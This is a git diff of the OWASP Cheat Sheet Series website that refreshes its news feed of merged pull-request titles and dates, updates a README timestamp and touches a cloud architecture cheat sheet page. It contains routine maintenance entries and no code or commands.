diff --git a/News.xml b/News.xml index 8bca906ca1..ec067da590 100644 --- a/News.xml +++ b/News.xml @@ -1,2 +1,2 @@ -https://cheatsheetseries.owasp.org/OWASP Cheat Sheet Series update2023-07-07T21:33:33+00:00Core teamdominique.righetto@owasp.orgpython-feedgenhttps://cheatsheetseries.owasp.org/gitbook/images/favicon.icoList of the last updates on the contenthttps://github.com/OWASP/CheatSheetSeries/pull/1017JSON Web Token for Java: Minor grammar fixes2022-12-19T09:49:08+00:002022-12-19T09:49:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1020Update: Microservices Security Cheat Sheet2022-12-20T09:31:51+00:002022-12-20T09:31:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1021Auth Cheat Sheet: Logging chapter - Updated Link to Top10 20212022-12-20T09:14:50+00:002022-12-20T09:14:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1022Minor Update: Query_Parameterization_Cheat_Sheet.md wording and references2022-12-20T09:17:30+00:002022-12-20T09:17:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1023Update deprecated headers Expect-CT and Public-Key-Pins information2023-01-02T14:51:00+00:002023-01-02T14:51:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1025Update: Docker Security Cheat Sheet - Removed deprecated tool: Aqua Security's MicroScanner2022-12-21T14:40:09+00:002022-12-21T14:40:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1026Update GH Actions versions; Pin Ubuntu version2022-12-21T14:37:01+00:002022-12-21T14:37:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1028Update Securing_Cascading_Style_Sheets_Cheat_Sheet.md2023-01-02T22:16:34+00:002023-01-02T22:16:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1030Update Error_Handling_Cheat_Sheet.md2023-01-02T15:01:14+00:002023-01-02T15:01:14+00:00https://github.com/OWASP/CheatSheetSeries/pull/1031Release a Network segmentation Cheat Sheet?2023-01-02T22:08:07+00:002023-01-02T22:08:07+00:00https://github.com/OWASP/CheatSheetSeries/pull/1032Update Logging Cheat Sheet2023-01-02T22:16:46+00:002023-01-02T22:16:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1037Fix minor typos in Contributing2023-01-02T14:56:46+00:002023-01-02T14:56:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1038Add first version of DRF Cheat Sheet2023-01-02T22:05:22+00:002023-01-02T22:05:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1039add PT bug bounty site2023-01-02T22:04:56+00:002023-01-02T22:04:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1040Replaced broken resources2023-01-02T15:01:36+00:002023-01-02T15:01:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1042Add OPA alternatives for policy as code2023-01-02T14:48:10+00:002023-01-02T14:48:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1044Minor fix: Rename Network Segmentation CS to include md extension2023-01-02T23:30:03+00:002023-01-02T23:30:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1045Fix typos2023-01-03T16:17:26+00:002023-01-03T16:17:26+00:00https://github.com/OWASP/CheatSheetSeries/pull/1046Fix2023-01-03T16:17:52+00:002023-01-03T16:17:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1047Add blank lines2023-01-03T16:18:10+00:002023-01-03T16:18:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1048Fix by @kianmeng2023-01-03T16:18:33+00:002023-01-03T16:18:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1049Publish Django REST Framework CS2023-01-04T17:37:36+00:002023-01-04T17:37:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1050Delete draft because 
released2023-01-10T01:27:44+00:002023-01-10T01:27:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1051Update XSS_Filter_Evasion_Cheat_Sheet.md2023-01-09T16:16:45+00:002023-01-09T16:16:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1052Fix typos in HTTP_Headers_Cheat_Sheet.md2023-01-09T16:15:44+00:002023-01-09T16:15:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1053Added punctuation2023-01-09T17:06:54+00:002023-01-09T17:06:54+00:00https://github.com/OWASP/CheatSheetSeries/pull/1054replaced broken link on password storage cheatsheet2023-01-11T14:20:10+00:002023-01-11T14:20:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1055Update PBKDF2 work factors according to RTX4000 #10432023-01-23T18:52:28+00:002023-01-23T18:52:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1059Add szh to the code team!2023-01-20T16:14:53+00:002023-01-20T16:14:53+00:00https://github.com/OWASP/CheatSheetSeries/pull/1060Team updates2023-01-20T16:24:56+00:002023-01-20T16:24:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1061Update CODEOWNERS2023-01-20T16:30:49+00:002023-01-20T16:30:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1063Add Secrets Management to index2023-01-23T18:50:28+00:002023-01-23T18:50:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1064modified script link with new one previous script link not working2023-01-23T18:06:58+00:00szhhttps://github.com/szh2023-01-23T18:06:58+00:00https://github.com/OWASP/CheatSheetSeries/pull/1065Update iac cheatsheet2023-01-23T18:50:10+00:002023-01-23T18:50:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1066Remove outdated draft CS2023-01-23T18:49:46+00:002023-01-23T18:49:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1067Proofreading of SQL Injection CS2023-01-23T18:49:31+00:002023-01-23T18:49:31+00:00https://github.com/OWASP/CheatSheetSeries/pull/1069fix a typo2023-01-24T14:10:55+00:002023-01-24T14:10:55+00:00https://github.com/OWASP/CheatSheetSeries/pull/1070Added Paralle PDKF2 in #1043 and Login Throttling in #8922023-01-29T14:20:30+00:002023-01-29T14:20:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1072Update ALLOW-FROM browser support in Clickjacking Defense Cheat Sheet2023-01-24T14:25:36+00:002023-01-24T14:25:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1073Update Argon2 and scrypt work factors2023-01-24T19:52:23+00:002023-01-24T19:52:23+00:00https://github.com/OWASP/CheatSheetSeries/pull/1074Update Secrets Management CS2023-01-24T19:53:57+00:002023-01-24T19:53:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1076Minor typo correction2023-01-27T13:58:03+00:002023-01-27T13:58:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1077Update Docker_Security_Cheat_Sheet2023-01-27T14:08:45+00:002023-01-27T14:08:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1079Fix broken link on JSON Web Token Cheat Sheet for Java2023-01-29T14:18:15+00:002023-01-29T14:18:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1080fixed some typos/grammatical errors2023-01-31T12:58:34+00:002023-01-31T12:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1082Add reference for DRF CS2023-02-13T13:56:59+00:002023-02-13T13:56:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1084Add note on Argument Injection2023-03-22T16:57:47+00:002023-03-22T16:57:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1085Small grammatical/typo fixes2023-02-05T00:42:59+00:002023-02-05T00:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1086Public-Key-Pins header has been 
deprecated2023-02-13T13:35:04+00:002023-02-13T13:35:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1088Added flags to enable secure processing and explicitly disable XInclu…2023-02-17T17:38:22+00:002023-02-17T17:38:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1090Secure design2023-02-22T15:14:09+00:002023-02-22T15:14:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1091DOM Clobbering Prevention Cheat Sheet2023-02-19T17:48:11+00:002023-02-19T17:48:11+00:00https://github.com/OWASP/CheatSheetSeries/pull/1093XSS: remove forward slash (fixes #1089)2023-02-22T14:42:59+00:00szhhttps://github.com/szh2023-02-22T14:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1095Refactored name.2023-02-22T15:40:50+00:002023-02-22T15:40:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1096Fix cs filename2023-02-24T09:52:09+00:002023-02-24T09:52:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1097Improve JAXB example/recommendation with 'disallow-doctype-decl' feat…2023-03-04T03:59:57+00:002023-03-04T03:59:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1099deserialization: typo and some wording2023-03-04T03:58:34+00:002023-03-04T03:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1100deserialization: typo :)2023-03-04T04:17:13+00:002023-03-04T04:17:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1102Add pinning cautions2023-03-14T12:35:06+00:002023-03-14T12:35:06+00:00https://github.com/OWASP/CheatSheetSeries/pull/1103Clarity to JAXP DocumentBuilderFactory section2023-03-22T16:58:57+00:002023-03-22T16:58:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1104[NodeJS Security Cheat Sheet] Fix Express 4.x deprecated res.send2023-03-16T13:13:45+00:002023-03-16T13:13:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1105[NodeJS Security Cheat Sheet] Update various helmet middlewares2023-03-20T12:23:47+00:002023-03-20T12:23:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1106Add Rust Query Parameterization recommendations2023-03-22T16:54:56+00:002023-03-22T16:54:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1107Update XML_External_Entity_Prevention_Cheat_Sheet.md2023-03-24T20:12:49+00:002023-03-24T20:12:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1108Remove link to leapgraph that redirects to gambling website2023-03-29T18:58:34+00:002023-03-29T18:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1113Fix CSRF reference link2023-04-05T15:56:52+00:002023-04-05T15:56:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1115REST Security Cheat Sheet - Removed Deprecated Feature-Policy and added Permissions-Policy 2023-04-22T01:27:20+00:002023-04-22T01:27:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1116Update Password_Storage_Cheat_Sheet.md2023-04-13T20:09:04+00:002023-04-13T20:09:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1117Improved JAXB Example2023-05-31T19:49:20+00:002023-05-31T19:49:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1120Update Input_Validation_Cheat_Sheet.md Fixed a stray any2023-04-17T13:25:15+00:002023-04-17T13:25:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1122document custom request headers as a standalone CSRF protection2023-05-23T08:18:27+00:002023-05-23T08:18:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1125Commit for issue #11242023-04-28T10:31:25+00:002023-04-28T10:31:25+00:00https://github.com/OWASP/CheatSheetSeries/pull/1126Clarify that ProcessStartInfo.ArgumentList is not safe with untrusted 
data2023-05-02T13:28:21+00:002023-05-02T13:28:21+00:00https://github.com/OWASP/CheatSheetSeries/pull/1130remove SeaSponge from Threat Modeling Cheat Sheet2023-05-10T13:35:09+00:002023-05-10T13:35:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1131HTTP_Headers_Cheat_Sheet: Add missing comma in Permissions-Policy2023-05-10T13:35:27+00:002023-05-10T13:35:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1134Added pytm to tools and CTM to threat libraries list2023-05-18T16:34:32+00:002023-05-18T16:34:32+00:00https://github.com/OWASP/CheatSheetSeries/pull/1136Fix typo in CSRF Prevention cheat sheet2023-05-23T18:07:43+00:002023-05-23T18:07:43+00:00https://github.com/OWASP/CheatSheetSeries/pull/1137I checked to see if there are any other broken links on the page but this onre was quiet annoying when reading the post.2023-05-30T12:28:13+00:002023-05-30T12:28:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1138Adding some sample encryption code to the DotNet cheatsheet2023-06-13T12:14:59+00:002023-06-13T12:14:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1139Reintroduce an overview of Double Submit Cookie with HMAC2023-05-31T19:01:15+00:002023-05-31T19:01:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1142Lint fix2023-05-31T19:17:59+00:002023-05-31T19:17:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1144Typo in pseudocode2023-06-08T13:28:08+00:002023-06-08T13:28:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1146Creating dedicated Java Security Cheat Sheet2023-06-30T17:02:01+00:002023-06-30T17:02:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1150Fix issue with nonce reuse2023-06-22T12:58:29+00:002023-06-22T12:58:29+00:00https://github.com/OWASP/CheatSheetSeries/pull/1151Fix typo on CSRF cheat sheet2023-06-22T19:10:00+00:002023-06-22T19:10:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1152Secure Cloud Architecture cheat sheet2023-07-07T21:31:57+00:002023-07-07T21:31:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1154Removed Encrypted CSRF Cookie2023-06-25T17:42:13+00:002023-06-25T17:42:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1156Update markdown lint to allow collapsible sections2023-06-25T17:41:46+00:002023-06-25T17:41:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1157Initial start for prototype pollution prevention cheatsheet2023-06-30T17:02:33+00:002023-06-30T17:02:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1158Fix linting config2023-06-26T18:01:59+00:002023-06-26T18:01:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1159Add some pitfalls to the dotnet crypto code2023-06-30T17:02:51+00:002023-06-30T17:02:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1160Minor modifications to Java cheatsheet2023-07-05T13:22:57+00:002023-07-05T13:22:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1161Fix points which @szh raised in #11572023-07-05T12:04:15+00:002023-07-05T12:04:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1162Fix collapsible labels2023-07-05T13:27:48+00:002023-07-05T13:27:48+00:00https://github.com/OWASP/CheatSheetSeries/pull/1163Update Ruby_on_Rails_Cheat_Sheet.md2023-07-06T13:16:08+00:002023-07-06T13:16:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1164Replaced dead link in the Key Management Cheat Sheet2023-07-06T13:49:51+00:002023-07-06T13:49:51+00:00 \ No newline at end of file +https://cheatsheetseries.owasp.org/OWASP Cheat Sheet Series update2023-07-10T13:32:31+00:00Core 
teamdominique.righetto@owasp.orgpython-feedgenhttps://cheatsheetseries.owasp.org/gitbook/images/favicon.icoList of the last updates on the contenthttps://github.com/OWASP/CheatSheetSeries/pull/1020Update: Microservices Security Cheat Sheet2022-12-20T09:31:51+00:002022-12-20T09:31:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1021Auth Cheat Sheet: Logging chapter - Updated Link to Top10 20212022-12-20T09:14:50+00:002022-12-20T09:14:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1022Minor Update: Query_Parameterization_Cheat_Sheet.md wording and references2022-12-20T09:17:30+00:002022-12-20T09:17:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1023Update deprecated headers Expect-CT and Public-Key-Pins information2023-01-02T14:51:00+00:002023-01-02T14:51:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1025Update: Docker Security Cheat Sheet - Removed deprecated tool: Aqua Security's MicroScanner2022-12-21T14:40:09+00:002022-12-21T14:40:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1026Update GH Actions versions; Pin Ubuntu version2022-12-21T14:37:01+00:002022-12-21T14:37:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1028Update Securing_Cascading_Style_Sheets_Cheat_Sheet.md2023-01-02T22:16:34+00:002023-01-02T22:16:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1030Update Error_Handling_Cheat_Sheet.md2023-01-02T15:01:14+00:002023-01-02T15:01:14+00:00https://github.com/OWASP/CheatSheetSeries/pull/1031Release a Network segmentation Cheat Sheet?2023-01-02T22:08:07+00:002023-01-02T22:08:07+00:00https://github.com/OWASP/CheatSheetSeries/pull/1032Update Logging Cheat Sheet2023-01-02T22:16:46+00:002023-01-02T22:16:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1037Fix minor typos in Contributing2023-01-02T14:56:46+00:002023-01-02T14:56:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1038Add first version of DRF Cheat Sheet2023-01-02T22:05:22+00:002023-01-02T22:05:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1039add PT bug bounty site2023-01-02T22:04:56+00:002023-01-02T22:04:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1040Replaced broken resources2023-01-02T15:01:36+00:002023-01-02T15:01:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1042Add OPA alternatives for policy as code2023-01-02T14:48:10+00:002023-01-02T14:48:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1044Minor fix: Rename Network Segmentation CS to include md extension2023-01-02T23:30:03+00:002023-01-02T23:30:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1045Fix typos2023-01-03T16:17:26+00:002023-01-03T16:17:26+00:00https://github.com/OWASP/CheatSheetSeries/pull/1046Fix2023-01-03T16:17:52+00:002023-01-03T16:17:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1047Add blank lines2023-01-03T16:18:10+00:002023-01-03T16:18:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1048Fix by @kianmeng2023-01-03T16:18:33+00:002023-01-03T16:18:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1049Publish Django REST Framework CS2023-01-04T17:37:36+00:002023-01-04T17:37:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1050Delete draft because released2023-01-10T01:27:44+00:002023-01-10T01:27:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1051Update XSS_Filter_Evasion_Cheat_Sheet.md2023-01-09T16:16:45+00:002023-01-09T16:16:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1052Fix typos in 
HTTP_Headers_Cheat_Sheet.md2023-01-09T16:15:44+00:002023-01-09T16:15:44+00:00https://github.com/OWASP/CheatSheetSeries/pull/1053Added punctuation2023-01-09T17:06:54+00:002023-01-09T17:06:54+00:00https://github.com/OWASP/CheatSheetSeries/pull/1054replaced broken link on password storage cheatsheet2023-01-11T14:20:10+00:002023-01-11T14:20:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1055Update PBKDF2 work factors according to RTX4000 #10432023-01-23T18:52:28+00:002023-01-23T18:52:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1059Add szh to the code team!2023-01-20T16:14:53+00:002023-01-20T16:14:53+00:00https://github.com/OWASP/CheatSheetSeries/pull/1060Team updates2023-01-20T16:24:56+00:002023-01-20T16:24:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1061Update CODEOWNERS2023-01-20T16:30:49+00:002023-01-20T16:30:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1063Add Secrets Management to index2023-01-23T18:50:28+00:002023-01-23T18:50:28+00:00https://github.com/OWASP/CheatSheetSeries/pull/1064modified script link with new one previous script link not working2023-01-23T18:06:58+00:00szhhttps://github.com/szh2023-01-23T18:06:58+00:00https://github.com/OWASP/CheatSheetSeries/pull/1065Update iac cheatsheet2023-01-23T18:50:10+00:002023-01-23T18:50:10+00:00https://github.com/OWASP/CheatSheetSeries/pull/1066Remove outdated draft CS2023-01-23T18:49:46+00:002023-01-23T18:49:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1067Proofreading of SQL Injection CS2023-01-23T18:49:31+00:002023-01-23T18:49:31+00:00https://github.com/OWASP/CheatSheetSeries/pull/1069fix a typo2023-01-24T14:10:55+00:002023-01-24T14:10:55+00:00https://github.com/OWASP/CheatSheetSeries/pull/1070Added Paralle PDKF2 in #1043 and Login Throttling in #8922023-01-29T14:20:30+00:002023-01-29T14:20:30+00:00https://github.com/OWASP/CheatSheetSeries/pull/1072Update ALLOW-FROM browser support in Clickjacking Defense Cheat Sheet2023-01-24T14:25:36+00:002023-01-24T14:25:36+00:00https://github.com/OWASP/CheatSheetSeries/pull/1073Update Argon2 and scrypt work factors2023-01-24T19:52:23+00:002023-01-24T19:52:23+00:00https://github.com/OWASP/CheatSheetSeries/pull/1074Update Secrets Management CS2023-01-24T19:53:57+00:002023-01-24T19:53:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1076Minor typo correction2023-01-27T13:58:03+00:002023-01-27T13:58:03+00:00https://github.com/OWASP/CheatSheetSeries/pull/1077Update Docker_Security_Cheat_Sheet2023-01-27T14:08:45+00:002023-01-27T14:08:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1079Fix broken link on JSON Web Token Cheat Sheet for Java2023-01-29T14:18:15+00:002023-01-29T14:18:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1080fixed some typos/grammatical errors2023-01-31T12:58:34+00:002023-01-31T12:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1082Add reference for DRF CS2023-02-13T13:56:59+00:002023-02-13T13:56:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1084Add note on Argument Injection2023-03-22T16:57:47+00:002023-03-22T16:57:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1085Small grammatical/typo fixes2023-02-05T00:42:59+00:002023-02-05T00:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1086Public-Key-Pins header has been deprecated2023-02-13T13:35:04+00:002023-02-13T13:35:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1088Added flags to enable secure processing and explicitly disable 
XInclu…2023-02-17T17:38:22+00:002023-02-17T17:38:22+00:00https://github.com/OWASP/CheatSheetSeries/pull/1090Secure design2023-02-22T15:14:09+00:002023-02-22T15:14:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1091DOM Clobbering Prevention Cheat Sheet2023-02-19T17:48:11+00:002023-02-19T17:48:11+00:00https://github.com/OWASP/CheatSheetSeries/pull/1093XSS: remove forward slash (fixes #1089)2023-02-22T14:42:59+00:00szhhttps://github.com/szh2023-02-22T14:42:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1095Refactored name.2023-02-22T15:40:50+00:002023-02-22T15:40:50+00:00https://github.com/OWASP/CheatSheetSeries/pull/1096Fix cs filename2023-02-24T09:52:09+00:002023-02-24T09:52:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1097Improve JAXB example/recommendation with 'disallow-doctype-decl' feat…2023-03-04T03:59:57+00:002023-03-04T03:59:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1099deserialization: typo and some wording2023-03-04T03:58:34+00:002023-03-04T03:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1100deserialization: typo :)2023-03-04T04:17:13+00:002023-03-04T04:17:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1102Add pinning cautions2023-03-14T12:35:06+00:002023-03-14T12:35:06+00:00https://github.com/OWASP/CheatSheetSeries/pull/1103Clarity to JAXP DocumentBuilderFactory section2023-03-22T16:58:57+00:002023-03-22T16:58:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1104[NodeJS Security Cheat Sheet] Fix Express 4.x deprecated res.send2023-03-16T13:13:45+00:002023-03-16T13:13:45+00:00https://github.com/OWASP/CheatSheetSeries/pull/1105[NodeJS Security Cheat Sheet] Update various helmet middlewares2023-03-20T12:23:47+00:002023-03-20T12:23:47+00:00https://github.com/OWASP/CheatSheetSeries/pull/1106Add Rust Query Parameterization recommendations2023-03-22T16:54:56+00:002023-03-22T16:54:56+00:00https://github.com/OWASP/CheatSheetSeries/pull/1107Update XML_External_Entity_Prevention_Cheat_Sheet.md2023-03-24T20:12:49+00:002023-03-24T20:12:49+00:00https://github.com/OWASP/CheatSheetSeries/pull/1108Remove link to leapgraph that redirects to gambling website2023-03-29T18:58:34+00:002023-03-29T18:58:34+00:00https://github.com/OWASP/CheatSheetSeries/pull/1113Fix CSRF reference link2023-04-05T15:56:52+00:002023-04-05T15:56:52+00:00https://github.com/OWASP/CheatSheetSeries/pull/1115REST Security Cheat Sheet - Removed Deprecated Feature-Policy and added Permissions-Policy 2023-04-22T01:27:20+00:002023-04-22T01:27:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1116Update Password_Storage_Cheat_Sheet.md2023-04-13T20:09:04+00:002023-04-13T20:09:04+00:00https://github.com/OWASP/CheatSheetSeries/pull/1117Improved JAXB Example2023-05-31T19:49:20+00:002023-05-31T19:49:20+00:00https://github.com/OWASP/CheatSheetSeries/pull/1120Update Input_Validation_Cheat_Sheet.md Fixed a stray any2023-04-17T13:25:15+00:002023-04-17T13:25:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1122document custom request headers as a standalone CSRF protection2023-05-23T08:18:27+00:002023-05-23T08:18:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1125Commit for issue #11242023-04-28T10:31:25+00:002023-04-28T10:31:25+00:00https://github.com/OWASP/CheatSheetSeries/pull/1126Clarify that ProcessStartInfo.ArgumentList is not safe with untrusted data2023-05-02T13:28:21+00:002023-05-02T13:28:21+00:00https://github.com/OWASP/CheatSheetSeries/pull/1130remove SeaSponge from Threat Modeling Cheat 
Sheet2023-05-10T13:35:09+00:002023-05-10T13:35:09+00:00https://github.com/OWASP/CheatSheetSeries/pull/1131HTTP_Headers_Cheat_Sheet: Add missing comma in Permissions-Policy2023-05-10T13:35:27+00:002023-05-10T13:35:27+00:00https://github.com/OWASP/CheatSheetSeries/pull/1134Added pytm to tools and CTM to threat libraries list2023-05-18T16:34:32+00:002023-05-18T16:34:32+00:00https://github.com/OWASP/CheatSheetSeries/pull/1136Fix typo in CSRF Prevention cheat sheet2023-05-23T18:07:43+00:002023-05-23T18:07:43+00:00https://github.com/OWASP/CheatSheetSeries/pull/1137I checked to see if there are any other broken links on the page but this onre was quiet annoying when reading the post.2023-05-30T12:28:13+00:002023-05-30T12:28:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1138Adding some sample encryption code to the DotNet cheatsheet2023-06-13T12:14:59+00:002023-06-13T12:14:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1139Reintroduce an overview of Double Submit Cookie with HMAC2023-05-31T19:01:15+00:002023-05-31T19:01:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1142Lint fix2023-05-31T19:17:59+00:002023-05-31T19:17:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1144Typo in pseudocode2023-06-08T13:28:08+00:002023-06-08T13:28:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1146Creating dedicated Java Security Cheat Sheet2023-06-30T17:02:01+00:002023-06-30T17:02:01+00:00https://github.com/OWASP/CheatSheetSeries/pull/1150Fix issue with nonce reuse2023-06-22T12:58:29+00:002023-06-22T12:58:29+00:00https://github.com/OWASP/CheatSheetSeries/pull/1151Fix typo on CSRF cheat sheet2023-06-22T19:10:00+00:002023-06-22T19:10:00+00:00https://github.com/OWASP/CheatSheetSeries/pull/1152Secure Cloud Architecture cheat sheet2023-07-07T21:31:57+00:002023-07-07T21:31:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1154Removed Encrypted CSRF Cookie2023-06-25T17:42:13+00:002023-06-25T17:42:13+00:00https://github.com/OWASP/CheatSheetSeries/pull/1156Update markdown lint to allow collapsible sections2023-06-25T17:41:46+00:002023-06-25T17:41:46+00:00https://github.com/OWASP/CheatSheetSeries/pull/1157Initial start for prototype pollution prevention cheatsheet2023-06-30T17:02:33+00:002023-06-30T17:02:33+00:00https://github.com/OWASP/CheatSheetSeries/pull/1158Fix linting config2023-06-26T18:01:59+00:002023-06-26T18:01:59+00:00https://github.com/OWASP/CheatSheetSeries/pull/1159Add some pitfalls to the dotnet crypto code2023-06-30T17:02:51+00:002023-06-30T17:02:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1160Minor modifications to Java cheatsheet2023-07-05T13:22:57+00:002023-07-05T13:22:57+00:00https://github.com/OWASP/CheatSheetSeries/pull/1161Fix points which @szh raised in #11572023-07-05T12:04:15+00:002023-07-05T12:04:15+00:00https://github.com/OWASP/CheatSheetSeries/pull/1162Fix collapsible labels2023-07-05T13:27:48+00:002023-07-05T13:27:48+00:00https://github.com/OWASP/CheatSheetSeries/pull/1163Update Ruby_on_Rails_Cheat_Sheet.md2023-07-06T13:16:08+00:002023-07-06T13:16:08+00:00https://github.com/OWASP/CheatSheetSeries/pull/1164Replaced dead link in the Key Management Cheat Sheet2023-07-06T13:49:51+00:002023-07-06T13:49:51+00:00https://github.com/OWASP/CheatSheetSeries/pull/1166Bug - Incorrect markdown link in Cloud Arch Sheet 2023-07-10T13:30:45+00:002023-07-10T13:30:45+00:00 \ No newline at end of file diff --git a/README.md b/README.md index 8aa6ea3bf1..8ce35c835a 100644 --- a/README.md +++ b/README.md @@ -1 +1 @@ -Website last update: 2023-07-07 at 21:35:24. 
+Website last update: 2023-07-10 at 13:33:57. diff --git a/bundle.zip b/bundle.zip index ec785413c6..2fb838eced 100644 Binary files a/bundle.zip and b/bundle.zip differ diff --git a/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html b/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html index 9c7b8ae1aa..4e5caee01e 100644 --- a/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html +++ b/cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html @@ -2243,7 +2243,7 @@

Simple Architecture Example

Trust Boundaries

